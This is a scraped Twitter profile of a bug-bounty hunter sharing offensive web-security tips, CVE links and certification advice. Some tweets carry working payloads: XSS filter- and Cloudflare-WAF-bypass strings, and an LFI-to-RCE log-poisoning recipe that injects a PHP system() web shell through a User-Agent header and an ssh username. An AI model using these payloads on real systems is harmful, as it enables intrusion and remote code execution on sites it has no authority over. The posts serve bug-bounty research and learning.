| eJPT Certified | C|EH v11 Certified | CompTIA Security + Certified | -Check my writeup on Medium | Bug Hunter |

127.0.0.1
Joined June 2019
Pinned Tweet
My new XSS Bypass Filter! "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs
12
222
3
592
Show this thread
0xJin retweeted
[New VM] Versteckt | Waiting for Friday? Still waiting while enjoy #hacking this VM made by our brother @bitc0de #hackmyvm #ctf #cybersecurity #pentesting #infosec hackmyvm.eu
0
6
0
7
0xJin retweeted
FYI: I know a LOT of people working in cybersecurity with 8+ years experience that don't have these skills: - command line - Windows internals - vuln analysis/ threat sim - pentest complex infra - exploit dev - reporting - *executing* TTPs - IT Risk - scripting/coding - tool dev
27
58
7
426
0xJin retweeted
Domain Lowering - A sophisticated attack for SOP bypass. Please let me know in the comments down below how do you like it. HD -> securityzines.com/flyers/dl.… #infosec #cybersecurity #pentesting #ctf #oscp #windows #cheatsheet #redteaming #learn365 #bugbounty #bugbountytips #zines
3
36
0
89
Show this thread
0xJin retweeted
#bugbountytips #BugBounty CVE-2021-21234 Spring Boot Actuator Logview Directory Traversal 1.Abstract 2.Proof of Concept 3. Fix More..bit.ly/3d8X9Rw
0
48
1
98
Researcher disclose details of an unpatched #vulnerability (CVE-2021-24084) in the Windows OS—known to #Microsoft since October 2020—that could allow an attacker to gain unauthorized access to the file system & read arbitrary files. Details: thehackernews.com/2021/11/un… #infosec
1
129
5
187
Best certifications for Jobs! #cybersecurity #Pentesting #hacking #hacker #bugbounty
10
112
5
336
0xJin retweeted
#bugbountytips #bugbounty CVE-2021–38314 #WordPress Unauthenticated Sensitive Information Disclosure More..bit.ly/3HYqTP4
0
104
3
266
0xJin retweeted
A payload that bypasses Cloudflare WAF, by @ex_mi <img/src=x onError="`${x}`;alert(`Ex.Mi`);">
4
142
0
492
Achieving LFI to RCE:- 1. Apache Log Poisoning 2. SSH Log Poisoning 3. SMTP Log Poisoning 4. Image Upload 5. /proc/self/environ 6. php://filter 7. Zip upload And more.
Achieving LFI to RCE 1. Apache Log Poisoning GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1 User-Agent: <?php system($_GET['c'])?> 2. SSH Log Poisoning ssh '<?php system($_GET['c'])?>'@target.com /show.php?file=/var/log/auth.log&c=ls (1/n)
Show this thread
3
107
0
284
This is a curated list by @Hacker0x01 of Burp plugins! ActiveScan++ Autorepeater Burp Autorize Burp BurpSentinel Flow Headless Burp Logger++ WSDL Wizard #cybersecurity #bugbountytips #hacking #webappsec #webhacking #pentesting THREAD 👇
Show this thread
0
7
0
5
0xJin retweeted
#bugbountytip #bugbounty Command Injection via Obsolete PHPThumb More...bit.ly/3cVmZIk
2
64
1
187